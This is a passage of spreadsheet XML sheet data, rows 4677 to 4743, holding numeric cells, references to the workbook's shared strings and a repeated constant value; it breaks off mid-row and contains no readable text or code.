    <row r="4677" ht="15.75" customHeight="1">
      <c r="A4677" s="1">
        <v>5008.0</v>
      </c>
      <c r="B4677" s="2">
        <v>4.4188282E7</v>
      </c>
      <c r="C4677" s="2" t="s">
        <v>4463</v>
      </c>
      <c r="D4677" s="2">
        <v>1.0</v>
      </c>
      <c r="E4677" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4677" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4678" ht="15.75" customHeight="1">
      <c r="A4678" s="1">
        <v>5152.0</v>
      </c>
      <c r="B4678" s="2">
        <v>4.4709647E7</v>
      </c>
      <c r="C4678" s="2" t="s">
        <v>4464</v>
      </c>
      <c r="D4678" s="2">
        <v>1.0</v>
      </c>
      <c r="E4678" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4678" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4679" ht="15.75" customHeight="1">
      <c r="A4679" s="1">
        <v>5450.0</v>
      </c>
      <c r="B4679" s="2">
        <v>4.5636845E7</v>
      </c>
      <c r="C4679" s="2" t="s">
        <v>4465</v>
      </c>
      <c r="D4679" s="2">
        <v>1.0</v>
      </c>
      <c r="E4679" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4679" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4680" ht="15.75" customHeight="1">
      <c r="A4680" s="1">
        <v>6310.0</v>
      </c>
      <c r="B4680" s="2">
        <v>4.8243187E7</v>
      </c>
      <c r="C4680" s="2" t="s">
        <v>4466</v>
      </c>
      <c r="D4680" s="2">
        <v>1.0</v>
      </c>
      <c r="E4680" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4680" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4681" ht="15.75" customHeight="1">
      <c r="A4681" s="1">
        <v>6857.0</v>
      </c>
      <c r="B4681" s="2">
        <v>4.9672871E7</v>
      </c>
      <c r="C4681" s="2" t="s">
        <v>4467</v>
      </c>
      <c r="D4681" s="2">
        <v>1.0</v>
      </c>
      <c r="E4681" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4681" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4682" ht="15.75" customHeight="1">
      <c r="A4682" s="1">
        <v>6943.0</v>
      </c>
      <c r="B4682" s="2">
        <v>4.9924088E7</v>
      </c>
      <c r="C4682" s="2" t="s">
        <v>4468</v>
      </c>
      <c r="D4682" s="2">
        <v>1.0</v>
      </c>
      <c r="E4682" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4682" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4683" ht="15.75" customHeight="1">
      <c r="A4683" s="1">
        <v>7120.0</v>
      </c>
      <c r="B4683" s="2">
        <v>5.0403464E7</v>
      </c>
      <c r="C4683" s="2" t="s">
        <v>4469</v>
      </c>
      <c r="D4683" s="2">
        <v>1.0</v>
      </c>
      <c r="E4683" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4683" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4684" ht="15.75" customHeight="1">
      <c r="A4684" s="1">
        <v>7418.0</v>
      </c>
      <c r="B4684" s="2">
        <v>5.1142982E7</v>
      </c>
      <c r="C4684" s="2" t="s">
        <v>4470</v>
      </c>
      <c r="D4684" s="2">
        <v>1.0</v>
      </c>
      <c r="E4684" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4684" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4685" ht="15.75" customHeight="1">
      <c r="A4685" s="1">
        <v>7474.0</v>
      </c>
      <c r="B4685" s="2">
        <v>5.1292894E7</v>
      </c>
      <c r="C4685" s="2" t="s">
        <v>4471</v>
      </c>
      <c r="D4685" s="2">
        <v>1.0</v>
      </c>
      <c r="E4685" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4685" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4686" ht="15.75" customHeight="1">
      <c r="A4686" s="1">
        <v>7637.0</v>
      </c>
      <c r="B4686" s="2">
        <v>5.1769717E7</v>
      </c>
      <c r="C4686" s="2" t="s">
        <v>4472</v>
      </c>
      <c r="D4686" s="2">
        <v>1.0</v>
      </c>
      <c r="E4686" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4686" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4687" ht="15.75" customHeight="1">
      <c r="A4687" s="1">
        <v>8452.0</v>
      </c>
      <c r="B4687" s="2">
        <v>5.3975429E7</v>
      </c>
      <c r="C4687" s="2" t="s">
        <v>4473</v>
      </c>
      <c r="D4687" s="2">
        <v>1.0</v>
      </c>
      <c r="E4687" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4687" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4688" ht="15.75" customHeight="1">
      <c r="A4688" s="1">
        <v>8651.0</v>
      </c>
      <c r="B4688" s="2">
        <v>5.4353502E7</v>
      </c>
      <c r="C4688" s="2" t="s">
        <v>4474</v>
      </c>
      <c r="D4688" s="2">
        <v>1.0</v>
      </c>
      <c r="E4688" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4688" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4689" ht="15.75" customHeight="1">
      <c r="A4689" s="1">
        <v>8708.0</v>
      </c>
      <c r="B4689" s="2">
        <v>5.4451996E7</v>
      </c>
      <c r="C4689" s="2" t="s">
        <v>4475</v>
      </c>
      <c r="D4689" s="2">
        <v>1.0</v>
      </c>
      <c r="E4689" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4689" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4690" ht="15.75" customHeight="1">
      <c r="A4690" s="1">
        <v>8748.0</v>
      </c>
      <c r="B4690" s="2">
        <v>5.4548777E7</v>
      </c>
      <c r="C4690" s="2" t="s">
        <v>4476</v>
      </c>
      <c r="D4690" s="2">
        <v>1.0</v>
      </c>
      <c r="E4690" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4690" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4691" ht="15.75" customHeight="1">
      <c r="A4691" s="1">
        <v>9034.0</v>
      </c>
      <c r="B4691" s="2">
        <v>5.5043656E7</v>
      </c>
      <c r="C4691" s="2" t="s">
        <v>4477</v>
      </c>
      <c r="D4691" s="2">
        <v>1.0</v>
      </c>
      <c r="E4691" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4691" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4692" ht="15.75" customHeight="1">
      <c r="A4692" s="1">
        <v>9645.0</v>
      </c>
      <c r="B4692" s="2">
        <v>5.6245362E7</v>
      </c>
      <c r="C4692" s="2" t="s">
        <v>4478</v>
      </c>
      <c r="D4692" s="2">
        <v>1.0</v>
      </c>
      <c r="E4692" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4692" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4693" ht="15.75" customHeight="1">
      <c r="A4693" s="1">
        <v>9731.0</v>
      </c>
      <c r="B4693" s="2">
        <v>5.6444558E7</v>
      </c>
      <c r="C4693" s="2" t="s">
        <v>4479</v>
      </c>
      <c r="D4693" s="2">
        <v>1.0</v>
      </c>
      <c r="E4693" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4693" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4694" ht="15.75" customHeight="1">
      <c r="A4694" s="1">
        <v>9805.0</v>
      </c>
      <c r="B4694" s="2">
        <v>5.6581609E7</v>
      </c>
      <c r="C4694" s="2" t="s">
        <v>4480</v>
      </c>
      <c r="D4694" s="2">
        <v>1.0</v>
      </c>
      <c r="E4694" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4694" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4695" ht="15.75" customHeight="1">
      <c r="A4695" s="1">
        <v>10074.0</v>
      </c>
      <c r="B4695" s="2">
        <v>5.7148162E7</v>
      </c>
      <c r="C4695" s="2" t="s">
        <v>4481</v>
      </c>
      <c r="D4695" s="2">
        <v>1.0</v>
      </c>
      <c r="E4695" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4695" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4696" ht="15.75" customHeight="1">
      <c r="A4696" s="1">
        <v>10289.0</v>
      </c>
      <c r="B4696" s="2">
        <v>5.7642422E7</v>
      </c>
      <c r="C4696" s="2" t="s">
        <v>4482</v>
      </c>
      <c r="D4696" s="2">
        <v>1.0</v>
      </c>
      <c r="E4696" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4696" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4697" ht="15.75" customHeight="1">
      <c r="A4697" s="1">
        <v>10434.0</v>
      </c>
      <c r="B4697" s="2">
        <v>1.0337775E7</v>
      </c>
      <c r="C4697" s="2" t="s">
        <v>4483</v>
      </c>
      <c r="D4697" s="2">
        <v>1.0</v>
      </c>
      <c r="E4697" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4697" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4698" ht="15.75" customHeight="1">
      <c r="A4698" s="1">
        <v>10525.0</v>
      </c>
      <c r="B4698" s="2">
        <v>1.2122503E7</v>
      </c>
      <c r="C4698" s="2" t="s">
        <v>4484</v>
      </c>
      <c r="D4698" s="2">
        <v>1.0</v>
      </c>
      <c r="E4698" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4698" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4699" ht="15.75" customHeight="1">
      <c r="A4699" s="1">
        <v>10574.0</v>
      </c>
      <c r="B4699" s="2">
        <v>1.2964169E7</v>
      </c>
      <c r="C4699" s="2" t="s">
        <v>4485</v>
      </c>
      <c r="D4699" s="2">
        <v>1.0</v>
      </c>
      <c r="E4699" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4699" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4700" ht="15.75" customHeight="1">
      <c r="A4700" s="1">
        <v>10959.0</v>
      </c>
      <c r="B4700" s="2">
        <v>1.7182834E7</v>
      </c>
      <c r="C4700" s="2" t="s">
        <v>4486</v>
      </c>
      <c r="D4700" s="2">
        <v>1.0</v>
      </c>
      <c r="E4700" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4700" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4701" ht="15.75" customHeight="1">
      <c r="A4701" s="1">
        <v>11027.0</v>
      </c>
      <c r="B4701" s="2">
        <v>1.7886424E7</v>
      </c>
      <c r="C4701" s="2" t="s">
        <v>4487</v>
      </c>
      <c r="D4701" s="2">
        <v>1.0</v>
      </c>
      <c r="E4701" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4701" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4702" ht="15.75" customHeight="1">
      <c r="A4702" s="1">
        <v>11046.0</v>
      </c>
      <c r="B4702" s="2">
        <v>1.8152866E7</v>
      </c>
      <c r="C4702" s="2" t="s">
        <v>4488</v>
      </c>
      <c r="D4702" s="2">
        <v>1.0</v>
      </c>
      <c r="E4702" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4702" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4703" ht="15.75" customHeight="1">
      <c r="A4703" s="1">
        <v>11904.0</v>
      </c>
      <c r="B4703" s="2">
        <v>2.5197303E7</v>
      </c>
      <c r="C4703" s="2" t="s">
        <v>4489</v>
      </c>
      <c r="D4703" s="2">
        <v>1.0</v>
      </c>
      <c r="E4703" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4703" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4704" ht="15.75" customHeight="1">
      <c r="A4704" s="1">
        <v>12129.0</v>
      </c>
      <c r="B4704" s="2">
        <v>2.6941321E7</v>
      </c>
      <c r="C4704" s="2" t="s">
        <v>4490</v>
      </c>
      <c r="D4704" s="2">
        <v>1.0</v>
      </c>
      <c r="E4704" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4704" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4705" ht="15.75" customHeight="1">
      <c r="A4705" s="1">
        <v>12222.0</v>
      </c>
      <c r="B4705" s="2">
        <v>2.7742652E7</v>
      </c>
      <c r="C4705" s="2" t="s">
        <v>4491</v>
      </c>
      <c r="D4705" s="2">
        <v>1.0</v>
      </c>
      <c r="E4705" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4705" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4706" ht="15.75" customHeight="1">
      <c r="A4706" s="1">
        <v>12459.0</v>
      </c>
      <c r="B4706" s="2">
        <v>2.9360088E7</v>
      </c>
      <c r="C4706" s="2" t="s">
        <v>4492</v>
      </c>
      <c r="D4706" s="2">
        <v>1.0</v>
      </c>
      <c r="E4706" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4706" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4707" ht="15.75" customHeight="1">
      <c r="A4707" s="1">
        <v>12679.0</v>
      </c>
      <c r="B4707" s="2">
        <v>3.0625967E7</v>
      </c>
      <c r="C4707" s="2" t="s">
        <v>4493</v>
      </c>
      <c r="D4707" s="2">
        <v>1.0</v>
      </c>
      <c r="E4707" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4707" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4708" ht="15.75" customHeight="1">
      <c r="A4708" s="1">
        <v>12735.0</v>
      </c>
      <c r="B4708" s="2">
        <v>3.1040626E7</v>
      </c>
      <c r="C4708" s="2" t="s">
        <v>4494</v>
      </c>
      <c r="D4708" s="2">
        <v>1.0</v>
      </c>
      <c r="E4708" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4708" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4709" ht="15.75" customHeight="1">
      <c r="A4709" s="1">
        <v>12736.0</v>
      </c>
      <c r="B4709" s="2">
        <v>3.1040626E7</v>
      </c>
      <c r="C4709" s="2" t="s">
        <v>4495</v>
      </c>
      <c r="D4709" s="2">
        <v>1.0</v>
      </c>
      <c r="E4709" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4709" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4710" ht="15.75" customHeight="1">
      <c r="A4710" s="1">
        <v>13612.0</v>
      </c>
      <c r="B4710" s="2">
        <v>3.5837738E7</v>
      </c>
      <c r="C4710" s="2" t="s">
        <v>4496</v>
      </c>
      <c r="D4710" s="2">
        <v>1.0</v>
      </c>
      <c r="E4710" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4710" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4711" ht="15.75" customHeight="1">
      <c r="A4711" s="1">
        <v>14661.0</v>
      </c>
      <c r="B4711" s="2">
        <v>4.0430732E7</v>
      </c>
      <c r="C4711" s="2" t="s">
        <v>4497</v>
      </c>
      <c r="D4711" s="2">
        <v>1.0</v>
      </c>
      <c r="E4711" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4711" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4712" ht="15.75" customHeight="1">
      <c r="A4712" s="1">
        <v>14856.0</v>
      </c>
      <c r="B4712" s="2">
        <v>4.1063933E7</v>
      </c>
      <c r="C4712" s="2" t="s">
        <v>4498</v>
      </c>
      <c r="D4712" s="2">
        <v>1.0</v>
      </c>
      <c r="E4712" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4712" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4713" ht="15.75" customHeight="1">
      <c r="A4713" s="1">
        <v>14886.0</v>
      </c>
      <c r="B4713" s="2">
        <v>4.1127042E7</v>
      </c>
      <c r="C4713" s="2" t="s">
        <v>4499</v>
      </c>
      <c r="D4713" s="2">
        <v>1.0</v>
      </c>
      <c r="E4713" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4713" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4714" ht="15.75" customHeight="1">
      <c r="A4714" s="1">
        <v>15153.0</v>
      </c>
      <c r="B4714" s="2">
        <v>4.1969761E7</v>
      </c>
      <c r="C4714" s="2" t="s">
        <v>4500</v>
      </c>
      <c r="D4714" s="2">
        <v>1.0</v>
      </c>
      <c r="E4714" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4714" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4715" ht="15.75" customHeight="1">
      <c r="A4715" s="1">
        <v>15226.0</v>
      </c>
      <c r="B4715" s="2">
        <v>4.2187331E7</v>
      </c>
      <c r="C4715" s="2" t="s">
        <v>4501</v>
      </c>
      <c r="D4715" s="2">
        <v>1.0</v>
      </c>
      <c r="E4715" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4715" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4716" ht="15.75" customHeight="1">
      <c r="A4716" s="1">
        <v>15276.0</v>
      </c>
      <c r="B4716" s="2">
        <v>4.2387643E7</v>
      </c>
      <c r="C4716" s="2" t="s">
        <v>4502</v>
      </c>
      <c r="D4716" s="2">
        <v>1.0</v>
      </c>
      <c r="E4716" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4716" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4717" ht="15.75" customHeight="1">
      <c r="A4717" s="1">
        <v>15647.0</v>
      </c>
      <c r="B4717" s="2">
        <v>4.361436E7</v>
      </c>
      <c r="C4717" s="2" t="s">
        <v>4503</v>
      </c>
      <c r="D4717" s="2">
        <v>1.0</v>
      </c>
      <c r="E4717" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4717" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4718" ht="15.75" customHeight="1">
      <c r="A4718" s="1">
        <v>15660.0</v>
      </c>
      <c r="B4718" s="2">
        <v>4.369433E7</v>
      </c>
      <c r="C4718" s="2" t="s">
        <v>4504</v>
      </c>
      <c r="D4718" s="2">
        <v>1.0</v>
      </c>
      <c r="E4718" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4718" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4719" ht="15.75" customHeight="1">
      <c r="A4719" s="1">
        <v>15721.0</v>
      </c>
      <c r="B4719" s="2">
        <v>4.3998035E7</v>
      </c>
      <c r="C4719" s="2" t="s">
        <v>4505</v>
      </c>
      <c r="D4719" s="2">
        <v>1.0</v>
      </c>
      <c r="E4719" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4719" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4720" ht="15.75" customHeight="1">
      <c r="A4720" s="1">
        <v>15934.0</v>
      </c>
      <c r="B4720" s="2">
        <v>4.4718848E7</v>
      </c>
      <c r="C4720" s="2" t="s">
        <v>4506</v>
      </c>
      <c r="D4720" s="2">
        <v>1.0</v>
      </c>
      <c r="E4720" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4720" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4721" ht="15.75" customHeight="1">
      <c r="A4721" s="1">
        <v>15954.0</v>
      </c>
      <c r="B4721" s="2">
        <v>4.4751783E7</v>
      </c>
      <c r="C4721" s="2" t="s">
        <v>4507</v>
      </c>
      <c r="D4721" s="2">
        <v>1.0</v>
      </c>
      <c r="E4721" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4721" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4722" ht="15.75" customHeight="1">
      <c r="A4722" s="1">
        <v>17317.0</v>
      </c>
      <c r="B4722" s="2">
        <v>4.9335729E7</v>
      </c>
      <c r="C4722" s="2" t="s">
        <v>4508</v>
      </c>
      <c r="D4722" s="2">
        <v>1.0</v>
      </c>
      <c r="E4722" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4722" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4723" ht="15.75" customHeight="1">
      <c r="A4723" s="1">
        <v>17605.0</v>
      </c>
      <c r="B4723" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C4723" s="2" t="s">
        <v>4509</v>
      </c>
      <c r="D4723" s="2">
        <v>1.0</v>
      </c>
      <c r="E4723" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4723" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4724" ht="15.75" customHeight="1">
      <c r="A4724" s="1">
        <v>17696.0</v>
      </c>
      <c r="B4724" s="2">
        <v>5.0529546E7</v>
      </c>
      <c r="C4724" s="2" t="s">
        <v>4510</v>
      </c>
      <c r="D4724" s="2">
        <v>1.0</v>
      </c>
      <c r="E4724" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4724" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4725" ht="15.75" customHeight="1">
      <c r="A4725" s="1">
        <v>17754.0</v>
      </c>
      <c r="B4725" s="2">
        <v>5.071022E7</v>
      </c>
      <c r="C4725" s="2" t="s">
        <v>4511</v>
      </c>
      <c r="D4725" s="2">
        <v>1.0</v>
      </c>
      <c r="E4725" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4725" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4726" ht="15.75" customHeight="1">
      <c r="A4726" s="1">
        <v>17948.0</v>
      </c>
      <c r="B4726" s="2">
        <v>5.1252532E7</v>
      </c>
      <c r="C4726" s="2" t="s">
        <v>4512</v>
      </c>
      <c r="D4726" s="2">
        <v>1.0</v>
      </c>
      <c r="E4726" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4726" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4727" ht="15.75" customHeight="1">
      <c r="A4727" s="1">
        <v>18863.0</v>
      </c>
      <c r="B4727" s="2">
        <v>5.3998898E7</v>
      </c>
      <c r="C4727" s="2" t="s">
        <v>4513</v>
      </c>
      <c r="D4727" s="2">
        <v>1.0</v>
      </c>
      <c r="E4727" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4727" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4728" ht="15.75" customHeight="1">
      <c r="A4728" s="1">
        <v>18920.0</v>
      </c>
      <c r="B4728" s="2">
        <v>5.4213522E7</v>
      </c>
      <c r="C4728" s="2" t="s">
        <v>4514</v>
      </c>
      <c r="D4728" s="2">
        <v>1.0</v>
      </c>
      <c r="E4728" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4728" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4729" ht="15.75" customHeight="1">
      <c r="A4729" s="1">
        <v>18974.0</v>
      </c>
      <c r="B4729" s="2">
        <v>5.4374837E7</v>
      </c>
      <c r="C4729" s="2" t="s">
        <v>4515</v>
      </c>
      <c r="D4729" s="2">
        <v>1.0</v>
      </c>
      <c r="E4729" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4729" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4730" ht="15.75" customHeight="1">
      <c r="A4730" s="1">
        <v>19259.0</v>
      </c>
      <c r="B4730" s="2">
        <v>5.5126027E7</v>
      </c>
      <c r="C4730" s="2" t="s">
        <v>4516</v>
      </c>
      <c r="D4730" s="2">
        <v>1.0</v>
      </c>
      <c r="E4730" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4730" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4731" ht="15.75" customHeight="1">
      <c r="A4731" s="1">
        <v>19304.0</v>
      </c>
      <c r="B4731" s="2">
        <v>5.522208E7</v>
      </c>
      <c r="C4731" s="2" t="s">
        <v>4517</v>
      </c>
      <c r="D4731" s="2">
        <v>1.0</v>
      </c>
      <c r="E4731" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4731" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4732" ht="15.75" customHeight="1">
      <c r="A4732" s="1">
        <v>19378.0</v>
      </c>
      <c r="B4732" s="2">
        <v>5.549376E7</v>
      </c>
      <c r="C4732" s="2" t="s">
        <v>4518</v>
      </c>
      <c r="D4732" s="2">
        <v>1.0</v>
      </c>
      <c r="E4732" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4732" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4733" ht="15.75" customHeight="1">
      <c r="A4733" s="1">
        <v>19384.0</v>
      </c>
      <c r="B4733" s="2">
        <v>5.5505493E7</v>
      </c>
      <c r="C4733" s="2" t="s">
        <v>4519</v>
      </c>
      <c r="D4733" s="2">
        <v>1.0</v>
      </c>
      <c r="E4733" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4733" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4734" ht="15.75" customHeight="1">
      <c r="A4734" s="1">
        <v>19407.0</v>
      </c>
      <c r="B4734" s="2">
        <v>5.5593222E7</v>
      </c>
      <c r="C4734" s="2" t="s">
        <v>4520</v>
      </c>
      <c r="D4734" s="2">
        <v>1.0</v>
      </c>
      <c r="E4734" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4734" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4735" ht="15.75" customHeight="1">
      <c r="A4735" s="1">
        <v>19553.0</v>
      </c>
      <c r="B4735" s="2">
        <v>5.605664E7</v>
      </c>
      <c r="C4735" s="2" t="s">
        <v>4521</v>
      </c>
      <c r="D4735" s="2">
        <v>1.0</v>
      </c>
      <c r="E4735" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4735" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4736" ht="15.75" customHeight="1">
      <c r="A4736" s="1">
        <v>19719.0</v>
      </c>
      <c r="B4736" s="2">
        <v>5.6586139E7</v>
      </c>
      <c r="C4736" s="2" t="s">
        <v>4522</v>
      </c>
      <c r="D4736" s="2">
        <v>1.0</v>
      </c>
      <c r="E4736" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4736" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4737" ht="15.75" customHeight="1">
      <c r="A4737" s="1">
        <v>19991.0</v>
      </c>
      <c r="B4737" s="2">
        <v>5.7646117E7</v>
      </c>
      <c r="C4737" s="2" t="s">
        <v>4523</v>
      </c>
      <c r="D4737" s="2">
        <v>1.0</v>
      </c>
      <c r="E4737" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4737" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4738" ht="15.75" customHeight="1">
      <c r="A4738" s="1">
        <v>20457.0</v>
      </c>
      <c r="B4738" s="2">
        <v>1.2675443E7</v>
      </c>
      <c r="C4738" s="2" t="s">
        <v>4524</v>
      </c>
      <c r="D4738" s="2">
        <v>1.0</v>
      </c>
      <c r="E4738" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4738" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4739" ht="15.75" customHeight="1">
      <c r="A4739" s="1">
        <v>20796.0</v>
      </c>
      <c r="B4739" s="2">
        <v>1.5254722E7</v>
      </c>
      <c r="C4739" s="2" t="s">
        <v>4525</v>
      </c>
      <c r="D4739" s="2">
        <v>1.0</v>
      </c>
      <c r="E4739" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4739" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4740" ht="15.75" customHeight="1">
      <c r="A4740" s="1">
        <v>21731.0</v>
      </c>
      <c r="B4740" s="2">
        <v>2.5711963E7</v>
      </c>
      <c r="C4740" s="2" t="s">
        <v>4526</v>
      </c>
      <c r="D4740" s="2">
        <v>1.0</v>
      </c>
      <c r="E4740" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4740" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4741" ht="15.75" customHeight="1">
      <c r="A4741" s="1">
        <v>21820.0</v>
      </c>
      <c r="B4741" s="2">
        <v>2.6931298E7</v>
      </c>
      <c r="C4741" s="2" t="s">
        <v>4527</v>
      </c>
      <c r="D4741" s="2">
        <v>1.0</v>
      </c>
      <c r="E4741" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4741" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4742" ht="15.75" customHeight="1">
      <c r="A4742" s="1">
        <v>25952.0</v>
      </c>
      <c r="B4742" s="2">
        <v>1.525472E7</v>
      </c>
      <c r="C4742" s="2" t="s">
        <v>4528</v>
      </c>
      <c r="D4742" s="2">
        <v>1.0</v>
      </c>
      <c r="E4742" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4742" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4743" ht="15.75" customHeight="1">
      <c r="A4743" s="1">
        <v>29734.0</v>
      </c>
      <c r="B4743" s="2">
        <v>3.4571795E7</v>
      </c>
      <c r="C4743" s="2" t="s">
        <v>4529</v>
      </c>
      <c r="D4743" s="2">
        <v>1.0</v>
      </c>
      <c r="E4743" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4743" s="2">
        <v>0.1013071895424836</v>
      </c>
